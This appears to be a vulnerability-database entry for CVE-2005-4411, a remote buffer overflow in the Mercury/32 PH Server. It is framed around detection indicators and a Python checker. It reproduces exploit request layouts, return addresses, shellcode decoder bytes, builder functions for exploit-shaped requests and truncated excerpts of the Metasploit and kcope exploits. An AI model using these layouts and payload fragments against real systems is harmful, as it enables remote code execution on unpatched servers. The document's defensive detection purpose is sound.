CVE-2005-4411
Published 2005-12-20
Buffer overflow in Mercury Mail Transport System 4.01b allows remote attackers to execute arbitrary code via a long request to TCP port 105.
Priority P2 (60) · high · CVSS 2.0 base score 7.5 · vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit code available
EPSS: 64.66% (99.1th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| david_harris | mercury_mail_transport_system | — | — |
Detection & IOCs (extracted from the sources listed below)

Command (Metasploit module, buffer construction):
    sploit = rand_text_alphanumeric(224) + payload + "\xeb\x06" + nops(2) + ret + [0xe8, -450].pack('CV') + "\r\n"
Bytes (EDB-1375, the 23-byte XOR decoder stub that opens the shellcode):
    \xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF
Bytes (EDB-1375, request layout):
    'A' (0x41) x 408 + shellcode + \x90\x90\xeb\x04 + ret + JJJJKKKKLLLLMMMMNNNNOOOOPPPP + \xe9\x87\xfe\xff\xff
- Flag oversized requests to TCP port 105 (the Mercury/32 PH Server). Both public exploits send several hundred bytes on a single line before the return-address overwrite (408 filler bytes in EDB-1375, 224 plus the payload in the Metasploit module); legitimate PH queries are short text commands.
- Look for the EDB-1375 padding pattern: 408 'A' (0x41) bytes followed by shellcode and the byte sequence \x90\x90\xeb\x04 on TCP port 105.
- The Metasploit module uses 224 bytes of alphanumeric padding before the payload and ends the line with the call-back trampoline (\xe8 followed by a little-endian rel32 of -450) and CRLF; alert on large single-line requests to port 105 with this structure.
- The module's bad characters are null, space, LF and CR (\x00\x20\x0a\x0d), so the payload carries no whitespace and no embedded line break before the terminating CRLF. PH is a text protocol: a long request line with no spaces and raw non-printable bytes in it is anomalous whichever exploit produced it.
- The target is the Mercury/32 PH Server Module (stack-based buffer overflow); monitor for unexpected child processes or outbound connections from the Mercury/32 process after connections on port 105.
- The Metasploit module sets EXITFUNC to 'thread', so the payload terminates only its own thread when it finishes: the service keeps running and process-crash detection will not fire on successful exploitation.
- The module sets StackAdjustment to -3500, which prepends a `sub esp, 3500` to the payload so that the payload's own stack use does not clobber the shellcode sitting below it on the stack. This is an adjustment within the same thread stack, not a stack pivot, so pivot detections keyed on ESP leaving the thread's stack range will not see it.
- The standalone exploit (EDB-1375) ships its shellcode XOR-encoded with 0xC2: the decoder stub listed above (mov cx, 0x125; xor byte [ebx+ecx], 0xC2; loop) decodes the following 293 bytes at runtime, so the callback IP and port, and the rest of the body, never appear in clear on the wire. Signature on the decoder stub, which is constant, rather than on the encoded body.
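The following Python is an added example, not code from this page, from the Metasploit module or from kcope's exploit. It applies the indicators above to constructed request lines, and reproduces offline what the EDB-1375 decoder stub listed above does on the target: it pulls the loop count (0x125) and the key (0xC2) out of the stub bytes and XORs the body with them, which is how an analyst recovers the callback address from a capture. The byte patterns are taken from the two exploits quoted on this page; the 256-byte length threshold, the `build_*` helpers, the fixed stand-in for the random alphanumeric prefix and the sample lines are assumptions made here.

```python
"""Indicator checks for CVE-2005-4411 (Mercury/32 PH Server, TCP/105).

Added example; not code from the page, the Metasploit module or EDB-1375.
Byte patterns come from the two exploits quoted on the page; the length
threshold, the build_* helpers and the sample lines are constructed here.
"""
import re
import struct

# EDB-1375 request layout: 408 x 'A', shellcode, jmp-short trampoline,
# return address, filler, then a jmp back into the shellcode.
EDB1375_PADDING = b"A" * 408
EDB1375_TRAMPOLINE = b"\x90\x90\xeb\x04"
EDB1375_JMP_BACK = b"\xe9\x87\xfe\xff\xff"
# 23-byte decoder stub at the start of $cbsc: jmp +0x10 / pop ebx / dec ebx /
# xor ecx,ecx / mov cx,0x125 / xor byte [ebx+ecx],0xC2 / loop / jmp +5 / call -0x15
EDB1375_DECODER_STUB = bytes.fromhex(
    "EB105B4B33C966B9250180340BC2E2FAEB05E8EBFFFFFF")

# Metasploit layout: 224 alphanumerics, payload, "\xeb\x06", two NOPs, ret,
# then "call -450" (0xE8 + little-endian rel32) and CRLF.
MSF_PREFIX_LEN = 224
MSF_TAIL = b"\xe8" + struct.pack("<i", -450) + b"\r\n"
MSF_BADCHARS = b"\x00\x20\x0a\x0d"

# Assumption: CCSO/PH queries are short text commands; anything longer than
# this on port 105 deserves a look.
MAX_SANE_PH_REQUEST = 256


def stub_parameters(stub: bytes):
    """Return (loop count, XOR key) from an EDB-1375 style decoder stub.

    'mov cx, imm16' encodes as 66 B9 <imm16>; 'xor byte [ebx+ecx], imm8'
    encodes as 80 34 0B <imm8>.
    """
    i = stub.find(b"\x66\xb9")
    j = stub.find(b"\x80\x34\x0b")
    if i < 0 or j < 0:
        raise ValueError("not a recognised decoder stub")
    return struct.unpack_from("<H", stub, i + 2)[0], stub[j + 3]


def decode_body(stub: bytes, body: bytes) -> bytes:
    """Do offline what the stub does on the target.

    After the call/pop trick ebx points one byte before the body and ecx
    counts 0x125 down to 1, so exactly `count` bytes from body[0] on are
    XORed with the key; anything after them is left untouched.
    """
    count, key = stub_parameters(stub)
    return bytes(b ^ key for b in body[:count]) + body[count:]


def indicators(line: bytes):
    """Names of the page's indicators that one request line to TCP/105 trips."""
    hits = []
    body = line.rstrip(b"\r\n")
    if len(line) > MAX_SANE_PH_REQUEST:
        hits.append("oversized_request")
    if line.startswith(EDB1375_PADDING):
        hits.append("edb1375_padding")
    if EDB1375_TRAMPOLINE in line:
        hits.append("edb1375_trampoline")
    if EDB1375_DECODER_STUB in line:
        hits.append("edb1375_decoder_stub")
    if EDB1375_JMP_BACK in line:
        hits.append("edb1375_jmp_back")
    # Metasploit: alphanumeric prefix, no BadChars after it, call-back tail.
    if (len(body) > MSF_PREFIX_LEN
            and re.fullmatch(rb"[A-Za-z0-9]{224}", body[:MSF_PREFIX_LEN])
            and not any(c in MSF_BADCHARS for c in body[MSF_PREFIX_LEN:])
            and line.endswith(MSF_TAIL)):
        hits.append("metasploit_layout")
    # PH is a text protocol: a long line with no space and raw binary in it
    # is anomalous whichever exploit produced it.
    if (len(body) >= MSF_PREFIX_LEN and b" " not in body
            and any(c < 0x20 or c > 0x7e for c in body)):
        hits.append("binary_no_whitespace")
    return hits


# --- constructed samples, not captured traffic ---------------------------
RET_XP = struct.pack("<I", 0x71aa32ad)   # XP SP0/SP1 'Ret' from the MSF module


def build_edb1375_like(plaintext: bytes, ret: bytes = RET_XP) -> bytes:
    """Assemble the EDB-1375 layout around a freshly XOR-encoded body."""
    count, key = stub_parameters(EDB1375_DECODER_STUB)
    encoded = bytes(b ^ key for b in plaintext.ljust(count, b"\x90"))
    return (EDB1375_PADDING + EDB1375_DECODER_STUB + encoded
            + EDB1375_TRAMPOLINE + ret
            + b"JJJJKKKKLLLLMMMMNNNNOOOOPPPP" + EDB1375_JMP_BACK + b"\r\n")


def build_msf_like(payload: bytes, ret: bytes = RET_XP) -> bytes:
    """Assemble the Metasploit layout with a fixed stand-in for the random prefix."""
    prefix = (b"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" * 7)[:MSF_PREFIX_LEN]
    return prefix + payload + b"\xeb\x06" + b"\x90\x90" + ret + MSF_TAIL


BENIGN_QUERY = b"query alias=jdoe return name email\r\n"
EDB_LINE = build_edb1375_like(b"callback 10.0.0.1:4444")
MSF_LINE = build_msf_like(b"\x90" * 64)

if __name__ == "__main__":
    for name, line in (("benign", BENIGN_QUERY), ("edb-1375", EDB_LINE),
                       ("metasploit", MSF_LINE)):
        print(f"{name:10s} {len(line):5d} bytes  {indicators(line)}")
```

The benign query trips nothing; the EDB-1375 line trips the length, padding, trampoline, decoder-stub and jmp-back indicators; the Metasploit line trips only the length, layout and binary-without-whitespace checks, which is why the protocol-level rule is the one worth keeping when the exploit's constants change. `decode_body` only ever XORs the count of bytes the stub names, so running it on the bytes between the stub and the trampoline of a captured line yields the callback address the attacker embedded.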
No detection rules found.
Exploit-DB
Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)
exploitdb · 2010-06-15 · CVE-2005-4411

Module header and the start of the exploit method as indexed. The opening lines of the header are garbled in the index text and are restored here from the module's own name, description and author; the excerpt is cut off mid-line in the source.

```ruby
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mercury/32 PH Server Module Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in
          Mercury/32 <= v4.01b PH Server Module. This issue is due to
          a failure of the application to properly bounds check
          user-supplied data prior to copying it to a fixed size
          memory buffer.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9525 $',
      'References'     =>
        [
          [ 'CVE', '2005-4411' ],
          [ 'OSVDB', '22103'],
          [ 'BID', '16396' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
          [ 'Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 } ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Dec 19 2005',
      'DefaultTarget'  => 0))

    register_options([ Opt::RPORT(105)], self)
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    sploit = rand_text_alphanumeric(224, payload_badc
```
Exploit-DB
Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow
exploitdb · 2005-12-16 · CVE-2005-4411

Header and the start of the XOR-encoded shellcode from EDB-1375 (kcope's Perl exploit); the excerpt is cut off mid-string in the source.

```perl
### mercurysexywarez
### Okayokay THiS iS 0DAY!!!
### Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT
### (PH SERVER)
### since me and my folks didn't find enough wild targets,
### i release this pretty warez to the public :PP
### kcope [kingcope(at)gmx.net] in 2005! JUUAREZ!
### Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!
###################################################################
use IO::Socket;

# 316 bytes
$cbsc =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\
```
Metasploit
Mercury/32 PH Server Module Buffer Overflow
This module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/18611
- http://securitytracker.com/id?1015374
- http://www.osvdb.org/22103
- http://www.securityfocus.com/bid/16396
- https://exchange.xforce.ibmcloud.com/vulnerabilities/23669
- https://www.exploit-db.com/exploits/1375
Published 2005-12-20